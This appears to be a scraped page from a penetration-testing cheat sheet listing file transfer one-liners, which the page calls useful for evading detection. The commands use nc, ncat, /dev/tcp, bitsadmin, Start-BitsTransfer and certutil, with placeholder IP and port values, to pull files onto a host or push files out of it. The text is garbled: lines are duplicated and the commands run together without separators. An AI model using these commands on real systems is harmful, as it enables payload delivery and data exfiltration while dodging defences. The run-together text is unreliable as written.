Miscellaneous
The different applications/tools can also be used for file transfer (also useful for Evading Detection).
Last updated
The different applications/tools can also be used for file transfer (also useful for Evading Detection).
Last updated
nc -l -p <PORT> > <NEW_NAME>nc -q 0 <IP> <PORT> < <FILE>nc -l -p <PORT> -q 0 < <FILE>nc <IP> <PORT> > <NEW_NAME>cat < /dev/tcp/<IP>/<PORT> > <NEW_NAME>ncat -l -p <PORT> --recv-only > <NEW_NAME>ncat --send-only <IP> <PORT> < <FILE>ncat -l -p <PORT> --send-only < <FILE>ncat <IP> <PORT> --recv-only > <NEW_NAME>cat < /dev/tcp/<IP>/<PORT> > <NEW_NAME>bitsadmin /transfer wcb /priority foreground http://<IP>:<PORT>/<FILE> <NEW_NAME>Import-Module bitstransfer; Start-BitsTransfer -Source "http://<IP>:<PORT>/<FILE>" -Destination "<NEW_NAME>"certutil.exe -verifyctl -split -f http://<IP>:<PORT>/<FILE>